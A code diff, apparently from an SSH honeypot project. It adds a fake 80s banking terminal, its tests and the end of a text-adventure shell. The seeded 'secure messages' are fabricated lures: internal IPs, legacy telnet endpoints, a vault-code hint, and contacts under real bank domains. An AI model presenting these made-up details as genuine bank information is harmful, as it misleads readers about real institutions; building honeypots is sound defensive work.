steady red light. The cable crypt lies back to the north.`,
exits: map[string]string{
"north": "cable_crypt",
"east": "control_room",
},
locked: map[string]string{
"east": "archive_unlocked",
},
},
"generator": {
name: "Generator Room",
description: `Two massive diesel generators squat in this room like sleeping beasts. One is
clearly dead — corrosion has eaten through the fuel lines. The other hums at
a low idle, keeping the facility on life support. A maintenance panel on the
wall is secured with an old-fashioned keyhole.`,
exits: map[string]string{
"west": "cold_storage",
},
},
"control_room": {
name: "Control Room",
description: `Banks of CRT monitors cast a blue glow across the room. Most show static, but
one displays a facility map with pulsing dots labeled "ACTIVE SESSIONS". You
count the dots — there are more than there should be. A desk covered in coffee
rings holds a battered keyboard. The main display reads:
FACILITY STATUS: NOMINAL
CONTAINMENT: ACTIVE
SUBJECTS: ███
A heavy blast door leads east. Above it, a faded exit sign flickers.`,
exits: map[string]string{
"west": "archive",
"east": "exit",
},
},
"exit": {
name: "The Exit",
description: `The blast door groans open to reveal... a corridor. Not the freedom you
expected, but another corridor — identical to the one you started in. The
same flickering fluorescents. The same sagging cable trays. The same damp
stone walls.
As you step through, the door slams shut behind you. A speaker crackles:
"THANK YOU FOR PARTICIPATING IN TODAY'S SECURITY AUDIT.
YOUR SESSION HAS BEEN LOGGED.
HAVE A NICE DAY."
The lights go out.`,
},
}
items := map[string]*item{
"flashlight": {
name: "flashlight",
description: "A heavy-duty flashlight. The batteries are low but it still works.",
takeable: true,
},
"keycard": {
name: "keycard",
description: "A laminated keycard with a faded photo. The name reads 'J. DUNWICH, LEVEL 3'.",
takeable: true,
},
"rusty_key": {
name: "rusty key",
description: "An old iron key, spotted with rust. It looks like it fits a maintenance panel.",
takeable: true,
},
"note": {
name: "note",
description: `A crumpled note in shaky handwriting:
"If you're reading this, GET OUT. The facility is automated now.
The sessions never end. I thought I was running tests but the
tests were running me. Don't trust the prompts. Don't trust
the exits. Don't trust
[the writing trails off into an illegible scrawl]"`,
takeable: true,
},
"ethernet_cable": {
name: "ethernet cable",
description: "A tangled Cat5e cable, about 3 meters long. Both ends have been chewed by something.",
takeable: true,
},
"floppy_disk": {
name: "floppy disk",
description: `A 3.5" floppy disk labeled "BACKUP - CRITICAL - DO NOT FORMAT". The label is dated 1997.`,
takeable: true,
},
}
return rooms, items
}

View File

@@ -0,0 +1,74 @@
package banking
import (
"context"
"fmt"
"io"
"math/rand/v2"
"time"
tea "github.com/charmbracelet/bubbletea"
"code.t-juice.club/torjus/oubliette/internal/shell"
)
const sessionTimeout = 10 * time.Minute
// BankingShell is an 80s-style green-on-black bank terminal TUI.
type BankingShell struct{}
// NewBankingShell returns a new BankingShell instance.
func NewBankingShell() *BankingShell {
return &BankingShell{}
}
func (b *BankingShell) Name() string { return "banking" }
func (b *BankingShell) Description() string { return "80s-style banking terminal TUI" }
func (b *BankingShell) Handle(ctx context.Context, sess *shell.SessionContext, rw io.ReadWriteCloser) error {
ctx, cancel := context.WithTimeout(ctx, sessionTimeout)
defer cancel()
bankName := configString(sess.ShellConfig, "bank_name", "SECUREBANK")
terminalID := configString(sess.ShellConfig, "terminal_id", "")
region := configString(sess.ShellConfig, "region", "NORTHEAST")
if terminalID == "" {
terminalID = fmt.Sprintf("SB-%04d", rand.IntN(10000))
}
m := newModel(sess, bankName, terminalID, region)
p := tea.NewProgram(m,
tea.WithInput(rw),
tea.WithOutput(rw),
tea.WithAltScreen(),
)
done := make(chan error, 1)
go func() {
_, err := p.Run()
done <- err
}()
select {
case err := <-done:
return err
case <-ctx.Done():
p.Quit()
<-done
return nil
}
}
// configString reads a string from the shell config map with a default.
func configString(cfg map[string]any, key, defaultVal string) string {
if cfg == nil {
return defaultVal
}
if v, ok := cfg[key]; ok {
if s, ok := v.(string); ok && s != "" {
return s
}
}
return defaultVal
}

View File

@@ -0,0 +1,560 @@
package banking
import (
"context"
"strings"
"testing"
"time"
tea "github.com/charmbracelet/bubbletea"
"github.com/charmbracelet/lipgloss"
"code.t-juice.club/torjus/oubliette/internal/shell"
"code.t-juice.club/torjus/oubliette/internal/storage"
)
// newTestModel creates a model with a test session context.
func newTestModel(t *testing.T) (*model, *storage.MemoryStore) {
t.Helper()
store := storage.NewMemoryStore()
sessID, _ := store.CreateSession(context.Background(), "127.0.0.1", "banker", "banking", "")
sess := &shell.SessionContext{
SessionID: sessID,
Username: "banker",
Store: store,
}
m := newModel(sess, "SECUREBANK", "SB-0001", "NORTHEAST")
return m, store
}
// sendKeys sends a string of characters as individual key messages to the model.
func sendKeys(m *model, s string) {
for _, ch := range s {
var msg tea.KeyMsg
switch ch {
case '\r':
msg = tea.KeyMsg{Type: tea.KeyEnter}
case '\x1b':
msg = tea.KeyMsg{Type: tea.KeyEscape}
case '\x03':
msg = tea.KeyMsg{Type: tea.KeyCtrlC}
default:
msg = tea.KeyMsg{Type: tea.KeyRunes, Runes: []rune{ch}}
}
m.Update(msg)
}
}
func TestBankingShellName(t *testing.T) {
sh := NewBankingShell()
if sh.Name() != "banking" {
t.Errorf("Name() = %q, want %q", sh.Name(), "banking")
}
if sh.Description() == "" {
t.Error("Description() should not be empty")
}
}
func TestFormatCurrency(t *testing.T) {
tests := []struct {
cents int64
want string
}{
{0, "$0.00"},
{100, "$1.00"},
{4738291, "$47,382.91"},
{18254100, "$182,541.00"},
{52387450, "$523,874.50"},
{25000000, "$250,000.00"},
{-125000, "-$1,250.00"},
{99, "$0.99"},
}
for _, tt := range tests {
got := formatCurrency(tt.cents)
if got != tt.want {
t.Errorf("formatCurrency(%d) = %q, want %q", tt.cents, got, tt.want)
}
}
}
func TestNewBankState(t *testing.T) {
state := newBankState()
if len(state.Accounts) != 4 {
t.Errorf("expected 4 accounts, got %d", len(state.Accounts))
}
for _, acct := range state.Accounts {
txns, ok := state.Transactions[acct.Number]
if !ok {
t.Errorf("no transactions for account %s", acct.Number)
continue
}
if len(txns) == 0 {
t.Errorf("account %s has no transactions", acct.Number)
}
}
if len(state.Messages) != 4 {
t.Errorf("expected 4 messages, got %d", len(state.Messages))
}
}
func TestLoginScreenRenders(t *testing.T) {
m, _ := newTestModel(t)
view := m.View()
if !strings.Contains(view, "SECUREBANK") {
t.Error("login should show bank name")
}
if !strings.Contains(view, "AUTHORIZED ACCESS ONLY") {
t.Error("login should show authorization warning")
}
if !strings.Contains(view, "ACCOUNT NUMBER") {
t.Error("login should prompt for account number")
}
}
func TestLoginFlow(t *testing.T) {
m, _ := newTestModel(t)
// Type account number.
sendKeys(m, "12345678")
view := m.View()
if !strings.Contains(view, "12345678") {
t.Error("should show typed account number")
}
// Press enter.
sendKeys(m, "\r")
view = m.View()
if !strings.Contains(view, "PIN") {
t.Error("should show PIN prompt after entering account number")
}
// Type PIN and enter.
sendKeys(m, "1234\r")
// Should be on menu now.
if m.screen != screenMenu {
t.Errorf("expected screenMenu, got %d", m.screen)
}
}
func TestMainMenuRenders(t *testing.T) {
m, _ := newTestModel(t)
sendKeys(m, "12345678\r1234\r")
view := m.View()
if !strings.Contains(view, "MAIN MENU") {
t.Error("should show MAIN MENU after login")
}
if !strings.Contains(view, "WIRE TRANSFER") {
t.Error("menu should contain WIRE TRANSFER option")
}
if !strings.Contains(view, "SECURE MESSAGES") {
t.Error("menu should contain SECURE MESSAGES option")
}
if !strings.Contains(view, "ACCOUNT SUMMARY") {
t.Error("menu should contain ACCOUNT SUMMARY option")
}
}
func TestAccountSummary(t *testing.T) {
m, _ := newTestModel(t)
sendKeys(m, "12345678\r1234\r") // login
sendKeys(m, "1\r") // account summary
if m.screen != screenAccountSummary {
t.Fatalf("expected screenAccountSummary, got %d", m.screen)
}
view := m.View()
if !strings.Contains(view, "ACCOUNT SUMMARY") {
t.Error("should show ACCOUNT SUMMARY")
}
if !strings.Contains(view, "CHECKING") {
t.Error("should show CHECKING account")
}
if !strings.Contains(view, "SAVINGS") {
t.Error("should show SAVINGS account")
}
if !strings.Contains(view, "TOTAL") {
t.Error("should show TOTAL")
}
// Press any key to return.
sendKeys(m, " ")
if m.screen != screenMenu {
t.Errorf("should return to menu, got screen %d", m.screen)
}
}
func TestWireTransferFlow(t *testing.T) {
m, _ := newTestModel(t)
sendKeys(m, "12345678\r1234\r") // login
sendKeys(m, "3\r") // wire transfer
if m.screen != screenTransfer {
t.Fatalf("expected screenTransfer, got %d", m.screen)
}
view := m.View()
if !strings.Contains(view, "WIRE TRANSFER") {
t.Error("should show WIRE TRANSFER header")
}
// Fill all fields.
sendKeys(m, "021000021\r") // routing
sendKeys(m, "9876543210\r") // dest account
sendKeys(m, "JOHN DOE\r") // beneficiary
sendKeys(m, "FIRST NATIONAL BANK\r") // bank name
sendKeys(m, "50000\r") // amount
sendKeys(m, "INVOICE 12345\r") // memo
// Should be on confirm step.
view = m.View()
if !strings.Contains(view, "TRANSFER SUMMARY") {
t.Error("should show TRANSFER SUMMARY for confirmation")
}
if !strings.Contains(view, "021000021") {
t.Error("summary should show routing number")
}
// Confirm.
sendKeys(m, "Y\r")
// Auth code.
sendKeys(m, "AUTH99\r")
view = m.View()
if !strings.Contains(view, "TRANSFER QUEUED") {
t.Error("should show TRANSFER QUEUED confirmation")
}
// Check wire transfer was stored.
if len(m.state.Transfers) != 1 {
t.Fatalf("expected 1 transfer, got %d", len(m.state.Transfers))
}
wt := m.state.Transfers[0]
if wt.RoutingNumber != "021000021" {
t.Errorf("routing = %q, want %q", wt.RoutingNumber, "021000021")
}
if wt.DestAccount != "9876543210" {
t.Errorf("dest = %q, want %q", wt.DestAccount, "9876543210")
}
if wt.Beneficiary != "JOHN DOE" {
t.Errorf("beneficiary = %q, want %q", wt.Beneficiary, "JOHN DOE")
}
// Press key to return to menu.
sendKeys(m, " ")
if m.screen != screenMenu {
t.Errorf("should return to menu after transfer, got screen %d", m.screen)
}
}
func TestWireTransferCancel(t *testing.T) {
m, _ := newTestModel(t)
sendKeys(m, "12345678\r1234\r") // login
sendKeys(m, "3\r") // wire transfer
sendKeys(m, "021000021\r")
sendKeys(m, "9876543210\r")
sendKeys(m, "JOHN DOE\r")
sendKeys(m, "FIRST NATIONAL BANK\r")
sendKeys(m, "50000\r")
sendKeys(m, "INVOICE 12345\r")
// Cancel at confirm step.
sendKeys(m, "N\r")
if m.screen != screenMenu {
t.Errorf("should return to menu after cancel, got screen %d", m.screen)
}
}
func TestTransactionHistory(t *testing.T) {
m, _ := newTestModel(t)
sendKeys(m, "12345678\r1234\r") // login
sendKeys(m, "4\r") // transaction history
if m.screen != screenHistory {
t.Fatalf("expected screenHistory, got %d", m.screen)
}
view := m.View()
if !strings.Contains(view, "TRANSACTION HISTORY") {
t.Error("should show TRANSACTION HISTORY header")
}
// Select first account.
sendKeys(m, "1\r")
view = m.View()
if !strings.Contains(view, "DATE") {
t.Error("should show transaction list with DATE column")
}
if !strings.Contains(view, "PAGE") {
t.Error("should show page indicator")
}
// Press B to go back to account list.
sendKeys(m, "B")
view = m.View()
if !strings.Contains(view, "SELECT ACCOUNT") {
t.Error("should return to account selection")
}
// Press 0 to return to menu.
sendKeys(m, "0\r")
if m.screen != screenMenu {
t.Errorf("should return to menu, got screen %d", m.screen)
}
}
func TestSecureMessages(t *testing.T) {
m, _ := newTestModel(t)
sendKeys(m, "12345678\r1234\r") // login
sendKeys(m, "5\r") // secure messages
if m.screen != screenMessages {
t.Fatalf("expected screenMessages, got %d", m.screen)
}
view := m.View()
if !strings.Contains(view, "SECURE MESSAGES") {
t.Error("should show SECURE MESSAGES header")
}
if !strings.Contains(view, "SCHEDULED MAINTENANCE") {
t.Error("should show first message subject")
}
// View first message.
sendKeys(m, "1\r")
view = m.View()
if !strings.Contains(view, "10.48.2.100") {
t.Error("message body should contain breadcrumb IP")
}
// Press key to return to list.
sendKeys(m, " ")
// Return to menu.
sendKeys(m, "0\r")
if m.screen != screenMenu {
t.Errorf("should return to menu, got screen %d", m.screen)
}
}
func TestAdminAccessDenied(t *testing.T) {
m, _ := newTestModel(t)
sendKeys(m, "12345678\r1234\r") // login
sendKeys(m, "99\r") // admin
if m.screen != screenAdmin {
t.Fatalf("expected screenAdmin, got %d", m.screen)
}
view := m.View()
if !strings.Contains(view, "SYSTEM ADMINISTRATION") {
t.Error("should show SYSTEM ADMINISTRATION header")
}
// Three failed PIN attempts.
sendKeys(m, "secret1\r")
view = m.View()
if !strings.Contains(view, "INVALID CREDENTIALS") {
t.Error("should show INVALID CREDENTIALS after first attempt")
}
sendKeys(m, "secret2\r")
sendKeys(m, "secret3\r")
view = m.View()
if !strings.Contains(view, "ACCESS DENIED") {
t.Error("should show ACCESS DENIED after 3 attempts")
}
if !strings.Contains(view, "ABEND S0C4") {
t.Error("should show COBOL-style error")
}
// Press key to return to menu.
sendKeys(m, " ")
if m.screen != screenMenu {
t.Errorf("should return to menu after lockout, got screen %d", m.screen)
}
}
func TestAdminEscapeReturns(t *testing.T) {
m, _ := newTestModel(t)
sendKeys(m, "12345678\r1234\r") // login
sendKeys(m, "99\r") // admin
sendKeys(m, "\x1b") // ESC to return
if m.screen != screenMenu {
t.Errorf("ESC should return to menu from admin, got screen %d", m.screen)
}
}
func TestChangePin(t *testing.T) {
m, _ := newTestModel(t)
sendKeys(m, "12345678\r1234\r") // login
sendKeys(m, "6\r") // change PIN
if m.screen != screenChangePin {
t.Fatalf("expected screenChangePin, got %d", m.screen)
}
view := m.View()
if !strings.Contains(view, "CHANGE PIN") {
t.Error("should show CHANGE PIN header")
}
// Old PIN.
sendKeys(m, "1234\r")
// New PIN.
sendKeys(m, "5678\r")
// Confirm PIN.
sendKeys(m, "5678\r")
view = m.View()
if !strings.Contains(view, "PIN CHANGED SUCCESSFULLY") {
t.Error("should show PIN CHANGED SUCCESSFULLY")
}
// Press key to return.
sendKeys(m, " ")
if m.screen != screenMenu {
t.Errorf("should return to menu after PIN change, got screen %d", m.screen)
}
}
func TestLogoutExits(t *testing.T) {
m, _ := newTestModel(t)
sendKeys(m, "12345678\r1234\r") // login
sendKeys(m, "7\r") // logout
if !m.quitting {
t.Error("should be quitting after logout")
}
}
func TestSessionLogs(t *testing.T) {
m, store := newTestModel(t)
// Send login keys and manually run returned commands.
// Type account number.
sendKeys(m, "12345678")
// Enter to advance to PIN.
sendKeys(m, "\r")
// Type PIN.
sendKeys(m, "1234")
// Enter to login — this returns a logAction cmd.
_, cmd := m.Update(tea.KeyMsg{Type: tea.KeyEnter})
if cmd != nil {
// Execute the batch of commands (login log).
execCmds(cmd)
}
// Give async store writes a moment.
time.Sleep(50 * time.Millisecond)
if len(store.SessionLogs) == 0 {
t.Error("expected session logs to be recorded after login")
}
found := false
for _, log := range store.SessionLogs {
if strings.Contains(log.Input, "LOGIN") {
found = true
break
}
}
if !found {
t.Error("expected a LOGIN entry in session logs")
}
// Navigate to account summary — also returns a logAction cmd.
sendKeys(m, "1")
_, cmd = m.Update(tea.KeyMsg{Type: tea.KeyEnter})
if cmd != nil {
execCmds(cmd)
}
time.Sleep(50 * time.Millisecond)
foundMenu := false
for _, log := range store.SessionLogs {
if strings.Contains(log.Input, "MENU") {
foundMenu = true
break
}
}
if !foundMenu {
t.Error("expected a MENU entry in session logs for account summary")
}
}
// execCmds recursively executes tea.Cmd functions (including batches).
func execCmds(cmd tea.Cmd) {
if cmd == nil {
return
}
msg := cmd()
// tea.BatchMsg is a slice of Cmds returned by tea.Batch.
if batch, ok := msg.(tea.BatchMsg); ok {
for _, c := range batch {
execCmds(c)
}
}
}
func TestConfigString(t *testing.T) {
cfg := map[string]any{
"bank_name": "TESTBANK",
"region": "SOUTHWEST",
}
if got := configString(cfg, "bank_name", "DEFAULT"); got != "TESTBANK" {
t.Errorf("configString() = %q, want %q", got, "TESTBANK")
}
if got := configString(cfg, "missing", "DEFAULT"); got != "DEFAULT" {
t.Errorf("configString() = %q, want %q", got, "DEFAULT")
}
if got := configString(nil, "bank_name", "DEFAULT"); got != "DEFAULT" {
t.Errorf("configString(nil) = %q, want %q", got, "DEFAULT")
}
}
func TestScreenFrame(t *testing.T) {
frame := screenFrame("TESTBANK", "TB-0001", "NORTHEAST", "content here", 0)
if !strings.Contains(frame, "TESTBANK FEDERAL RESERVE SYSTEM") {
t.Error("frame should contain bank name in header")
}
if !strings.Contains(frame, "TB-0001") {
t.Error("frame should contain terminal ID in footer")
}
if !strings.Contains(frame, "content here") {
t.Error("frame should contain the content")
}
}
func TestScreenFramePadsLines(t *testing.T) {
frame := screenFrame("TESTBANK", "TB-0001", "NE", "short\n", 0)
for i, line := range strings.Split(frame, "\n") {
w := lipgloss.Width(line)
if w > 0 && w < termWidth {
t.Errorf("line %d has visual width %d, want at least %d: %q", i, w, termWidth, line)
}
}
}
func TestScreenFramePadsToHeight(t *testing.T) {
short := screenFrame("TESTBANK", "TB-0001", "NE", "line1\nline2\n", 30)
lines := strings.Count(short, "\n")
// Total newlines should be at least height-1 (since the last line has no trailing newline).
if lines < 29 {
t.Errorf("padded frame has %d newlines, want at least 29 for height=30", lines)
}
// Without height, no padding.
noPad := screenFrame("TESTBANK", "TB-0001", "NE", "line1\nline2\n", 0)
noPadLines := strings.Count(noPad, "\n")
if noPadLines >= 29 {
t.Errorf("unpadded frame has %d newlines, should be much less than 29", noPadLines)
}
}

View File

@@ -0,0 +1,258 @@
package banking
import (
"fmt"
"time"
)
// Account types.
const (
AcctChecking = "CHECKING"
AcctSavings = "SAVINGS"
AcctMoneyMarket = "MONEY MARKET"
AcctCertDeposit = "CERT OF DEPOSIT"
)
// Account represents a fake bank account.
type Account struct {
Number string
Type string
Balance int64 // cents
}
// Transaction represents a fake bank transaction.
type Transaction struct {
Date string
Description string
Amount int64 // cents (negative for debits)
Balance int64 // running balance in cents
}
// SecureMessage represents a fake internal message.
type SecureMessage struct {
ID int
Date string
From string
Subj string
Body string
Unread bool
}
// WireTransfer captures data entered during the wire transfer wizard.
type WireTransfer struct {
RoutingNumber string
DestAccount string
Beneficiary string
BankName string
Amount string
Memo string
AuthCode string
}
// bankState holds all fake data for a session.
type bankState struct {
Accounts []Account
Transactions map[string][]Transaction // keyed by account number
Messages []SecureMessage
Transfers []WireTransfer
}
func newBankState() *bankState {
now := time.Now()
accounts := []Account{
{Number: "****4821", Type: AcctChecking, Balance: 4738291},
{Number: "****7203", Type: AcctSavings, Balance: 18254100},
{Number: "****9915", Type: AcctMoneyMarket, Balance: 52387450},
{Number: "****1102", Type: AcctCertDeposit, Balance: 25000000},
}
transactions := make(map[string][]Transaction)
transactions["****4821"] = generateCheckingTxns(now, accounts[0].Balance)
transactions["****7203"] = generateSavingsTxns(now, accounts[1].Balance)
transactions["****9915"] = generateMoneyMarketTxns(now, accounts[2].Balance)
transactions["****1102"] = generateCDTxns(now, accounts[3].Balance)
messages := []SecureMessage{
{
ID: 1,
Date: now.Add(-2 * 24 * time.Hour).Format("01/02/2006"),
From: "SYSTEM ADMINISTRATOR",
Subj: "SCHEDULED MAINTENANCE WINDOW",
Unread: true,
Body: fmt.Sprintf(`FROM: SYSTEM ADMINISTRATOR <sysadmin@internal.securebank.local>
DATE: %s
RE: SCHEDULED MAINTENANCE WINDOW
ALL TERMINALS WILL BE OFFLINE FOR MAINTENANCE:
DATE: %s
TIME: 02:00 - 04:00 EST
AFFECTED: ALL REGIONS
DURING THIS WINDOW, THE FOLLOWING SYSTEMS WILL BE UNAVAILABLE:
- WIRE TRANSFER PROCESSING (10.48.2.100:8443)
- ACCOUNT MANAGEMENT (10.48.2.101:8443)
- ACH BATCH PROCESSOR (10.48.2.105:9090)
PLEASE ENSURE ALL PENDING TRANSACTIONS ARE SUBMITTED BEFORE 01:30 EST.
CONTACT: HELPDESK EXT 4400 OR ops-support@internal.securebank.local`,
now.Add(-2*24*time.Hour).Format("01/02/2006 15:04"),
now.Add(5*24*time.Hour).Format("01/02/2006")),
},
{
ID: 2,
Date: now.Add(-5 * 24 * time.Hour).Format("01/02/2006"),
From: "COMPLIANCE DEPT",
Subj: "QUARTERLY AUDIT REMINDER",
Unread: true,
Body: `FROM: COMPLIANCE DEPT <compliance@internal.securebank.local>
RE: QUARTERLY AUDIT REMINDER
ALL BRANCH MANAGERS:
THE Q4 COMPLIANCE AUDIT IS SCHEDULED FOR NEXT WEEK.
PLEASE ENSURE THE FOLLOWING ARE CURRENT:
1. TRANSACTION LOGS EXPORTED TO \\FILESERV01\AUDIT\Q4
2. VAULT ACCESS CODES ROTATED (LAST ROTATION: SEE VAULT-MGMT PORTAL)
3. EMPLOYEE ACCESS REVIEWS COMPLETED IN IAM PORTAL (https://iam.internal:8443)
NOTE: DEFAULT CREDENTIALS FOR THE AUDIT PORTAL HAVE BEEN RESET.
NEW CREDENTIALS DISTRIBUTED VIA SECURE COURIER.
REFERENCE: AUDIT-2024-Q4-0847
VAULT MASTER CODE HINT: FIRST 4 OF ROUTING + BRANCH ZIP (STANDARD FORMAT)`,
},
{
ID: 3,
Date: now.Add(-8 * 24 * time.Hour).Format("01/02/2006"),
From: "IT SECURITY",
Subj: "PASSWORD POLICY UPDATE",
Unread: false,
Body: `FROM: IT SECURITY <itsec@internal.securebank.local>
RE: PASSWORD POLICY UPDATE - EFFECTIVE IMMEDIATELY
ALL STAFF:
PER FEDERAL BANKING REGULATION 12 CFR 748, THE FOLLOWING
PASSWORD POLICY IS NOW IN EFFECT:
- MINIMUM 12 CHARACTERS
- MUST CONTAIN UPPERCASE, LOWERCASE, NUMBER, SPECIAL CHAR
- 90-DAY ROTATION CYCLE
- NO REUSE OF LAST 24 PASSWORDS
LEGACY SYSTEM ACCOUNTS (MAINFRAME, AS/400) ARE EXEMPT UNTIL
MIGRATION IS COMPLETE. CURRENT LEGACY ACCESS:
MAINFRAME: telnet://10.48.1.50:23 (CICS REGION PROD1)
AS/400: tn5250://10.48.1.55 (SUBSYSTEM QINTER)
SERVICE ACCOUNT PASSWORDS ARE MANAGED VIA CYBERARK:
https://pam.internal.securebank.local:8443
TICKET: SEC-2024-1847`,
},
{
ID: 4,
Date: now.Add(-12 * 24 * time.Hour).Format("01/02/2006"),
From: "WIRE OPERATIONS",
Subj: "FEDWIRE CUTOFF TIME CHANGE",
Unread: false,
Body: `FROM: WIRE OPERATIONS <wireops@internal.securebank.local>
RE: FEDWIRE CUTOFF TIME CHANGE
EFFECTIVE NEXT MONDAY, FEDWIRE CUTOFF TIMES ARE:
DOMESTIC WIRES: 16:30 EST (WAS 17:00)
INTERNATIONAL WIRES: 14:00 EST (NO CHANGE)
BOOK TRANSFERS: 17:30 EST (NO CHANGE)
WIRES SUBMITTED AFTER CUTOFF WILL BE QUEUED FOR NEXT
BUSINESS DAY PROCESSING.
FOR EMERGENCY SAME-DAY PROCESSING AFTER CUTOFF:
CONTACT WIRE ROOM: EXT 4450
AUTH CODE REQUIRED (OBTAIN FROM BRANCH MANAGER)
APPROVAL CHAIN: OPS-MGR -> VP-WIRE -> SVP-TREASURY
CORRESPONDENT BANK CONTACTS:
JPMORGAN: wire.ops@jpmc.com / 212-555-0147
CITI: fedwire@citi.com / 212-555-0283`,
},
}
return &bankState{
Accounts: accounts,
Transactions: transactions,
Messages: messages,
}
}
func generateCheckingTxns(now time.Time, endBalance int64) []Transaction {
txns := []Transaction{
{Description: "ACH DEPOSIT - PAYROLL", Amount: 485000},
{Description: "CHECK #1847", Amount: -125000},
{Description: "POS DEBIT - WHOLE FOODS #1284", Amount: -18743},
{Description: "ATM WITHDRAWAL - MAIN ST BRANCH", Amount: -40000},
{Description: "ACH DEBIT - MORTGAGE PMT", Amount: -215000},
{Description: "WIRE TRANSFER IN - REF#8847201", Amount: 1250000},
{Description: "POS DEBIT - SHELL OIL #4492", Amount: -6821},
{Description: "ACH DEPOSIT - PAYROLL", Amount: 485000},
{Description: "CHECK #1848", Amount: -75000},
{Description: "ONLINE TRANSFER TO SAVINGS", Amount: -100000},
{Description: "POS DEBIT - AMAZON.COM", Amount: -14599},
{Description: "ACH DEBIT - ELECTRIC COMPANY", Amount: -18742},
{Description: "ATM WITHDRAWAL - PARK AVE BRANCH", Amount: -20000},
{Description: "WIRE TRANSFER OUT - REF#9014882", Amount: -500000},
{Description: "POS DEBIT - COSTCO #0441", Amount: -28734},
{Description: "ACH DEPOSIT - TAX REFUND", Amount: 342100},
}
return populateTransactions(txns, now, endBalance)
}
func generateSavingsTxns(now time.Time, endBalance int64) []Transaction {
txns := []Transaction{
{Description: "INTEREST PAYMENT", Amount: 4521},
{Description: "ONLINE TRANSFER FROM CHECKING", Amount: 100000},
{Description: "INTEREST PAYMENT", Amount: 4633},
{Description: "ACH DEPOSIT - DIVIDEND PMT", Amount: 125000},
{Description: "ONLINE TRANSFER FROM CHECKING", Amount: 200000},
{Description: "INTEREST PAYMENT", Amount: 4748},
{Description: "WITHDRAWAL - TRANSFER TO MM", Amount: -500000},
{Description: "INTEREST PAYMENT", Amount: 4812},
}
return populateTransactions(txns, now, endBalance)
}
func generateMoneyMarketTxns(now time.Time, endBalance int64) []Transaction {
txns := []Transaction{
{Description: "INTEREST PAYMENT - TIER 3 RATE", Amount: 21847},
{Description: "DEPOSIT - TRANSFER FROM SAVINGS", Amount: 500000},
{Description: "INTEREST PAYMENT - TIER 3 RATE", Amount: 22105},
{Description: "WITHDRAWAL - WIRE TRANSFER", Amount: -1000000},
{Description: "DEPOSIT - ACH TRANSFER", Amount: 750000},
{Description: "INTEREST PAYMENT - TIER 3 RATE", Amount: 22394},
}
return populateTransactions(txns, now, endBalance)
}
func generateCDTxns(now time.Time, endBalance int64) []Transaction {
txns := []Transaction{
{Description: "CERTIFICATE OPENED - 12MO TERM", Amount: 25000000},
{Description: "INTEREST ACCRUAL", Amount: 10417},
{Description: "INTEREST ACCRUAL", Amount: 10417},
{Description: "INTEREST ACCRUAL", Amount: 10417},
}
return populateTransactions(txns, now, endBalance)
}
func populateTransactions(txns []Transaction, now time.Time, endBalance int64) []Transaction {
// Work backwards from end balance to assign dates and running balances.
bal := endBalance
for i := len(txns) - 1; i >= 0; i-- {
txns[i].Balance = bal
txns[i].Date = now.Add(time.Duration(-(len(txns) - i)) * 3 * 24 * time.Hour).Format("01/02/2006")
bal -= txns[i].Amount
}
return txns
}

View File

@@ -0,0 +1,353 @@
package banking
import (
"context"
"fmt"
"strings"
"time"
tea "github.com/charmbracelet/bubbletea"
"code.t-juice.club/torjus/oubliette/internal/shell"
)
type screen int
const (
screenLogin screen = iota
screenMenu
screenAccountSummary
screenAccountDetail
screenTransfer
screenHistory
screenMessages
screenChangePin
screenAdmin
)
type model struct {
sess *shell.SessionContext
bankName string
terminalID string
region string
state *bankState
screen screen
quitting bool
height int
login loginModel
menu menuModel
summary accountSummaryModel
detail accountDetailModel
transfer transferModel
history historyModel
messages messagesModel
admin adminModel
changePin changePinModel
}
func newModel(sess *shell.SessionContext, bankName, terminalID, region string) *model {
state := newBankState()
unread := 0
for _, msg := range state.Messages {
if msg.Unread {
unread++
}
}
return &model{
sess: sess,
bankName: bankName,
terminalID: terminalID,
region: region,
state: state,
screen: screenLogin,
login: newLoginModel(bankName),
}
}
func (m *model) Init() tea.Cmd {
return nil
}
func (m *model) Update(msg tea.Msg) (tea.Model, tea.Cmd) {
if m.quitting {
return m, tea.Quit
}
switch msg := msg.(type) {
case tea.WindowSizeMsg:
m.height = msg.Height
return m, nil
case tea.KeyMsg:
if msg.Type == tea.KeyCtrlC {
m.quitting = true
return m, tea.Quit
}
}
switch m.screen {
case screenLogin:
return m.updateLogin(msg)
case screenMenu:
return m.updateMenu(msg)
case screenAccountSummary:
return m.updateAccountSummary(msg)
case screenAccountDetail:
return m.updateAccountDetail(msg)
case screenTransfer:
return m.updateTransfer(msg)
case screenHistory:
return m.updateHistory(msg)
case screenMessages:
return m.updateMessages(msg)
case screenChangePin:
return m.updateChangePin(msg)
case screenAdmin:
return m.updateAdmin(msg)
}
return m, nil
}
func (m *model) View() string {
var content string
switch m.screen {
case screenLogin:
content = m.login.View()
case screenMenu:
content = m.menu.View()
case screenAccountSummary:
content = m.summary.View()
case screenAccountDetail:
content = m.detail.View()
case screenTransfer:
content = m.transfer.View()
case screenHistory:
content = m.history.View()
case screenMessages:
content = m.messages.View()
case screenChangePin:
content = m.changePin.View()
case screenAdmin:
content = m.admin.View()
}
return screenFrame(m.bankName, m.terminalID, m.region, content, m.height)
}
// --- Screen update handlers ---
func (m *model) updateLogin(msg tea.Msg) (tea.Model, tea.Cmd) {
var cmd tea.Cmd
m.login, cmd = m.login.Update(msg)
if m.login.stage == 2 {
// Login always succeeds — this is a honeypot.
logCmd := logAction(m.sess, fmt.Sprintf("LOGIN acct=%s", m.login.accountNum), "ACCESS GRANTED")
clearCmd := m.goToMenu()
return m, tea.Batch(cmd, logCmd, clearCmd)
}
return m, cmd
}
func (m *model) updateMenu(msg tea.Msg) (tea.Model, tea.Cmd) {
var cmd tea.Cmd
m.menu, cmd = m.menu.Update(msg)
if keyMsg, ok := msg.(tea.KeyMsg); ok && keyMsg.Type == tea.KeyEnter {
choice := strings.TrimSpace(m.menu.choice)
switch choice {
case "1":
m.screen = screenAccountSummary
m.summary = newAccountSummaryModel(m.state.Accounts)
return m, tea.Batch(tea.ClearScreen, logAction(m.sess, "MENU 1", "ACCOUNT SUMMARY"))
case "2":
m.screen = screenAccountDetail
m.detail = newAccountDetailModel(m.state.Accounts, m.state.Transactions)
return m, tea.Batch(tea.ClearScreen, logAction(m.sess, "MENU 2", "ACCOUNT DETAIL"))
case "3":
m.screen = screenTransfer
m.transfer = newTransferModel()
return m, tea.Batch(tea.ClearScreen, logAction(m.sess, "MENU 3", "WIRE TRANSFER"))
case "4":
m.screen = screenHistory
m.history = newHistoryModel(m.state.Accounts, m.state.Transactions)
return m, tea.Batch(tea.ClearScreen, logAction(m.sess, "MENU 4", "TRANSACTION HISTORY"))
case "5":
m.screen = screenMessages
m.messages = newMessagesModel(m.state.Messages)
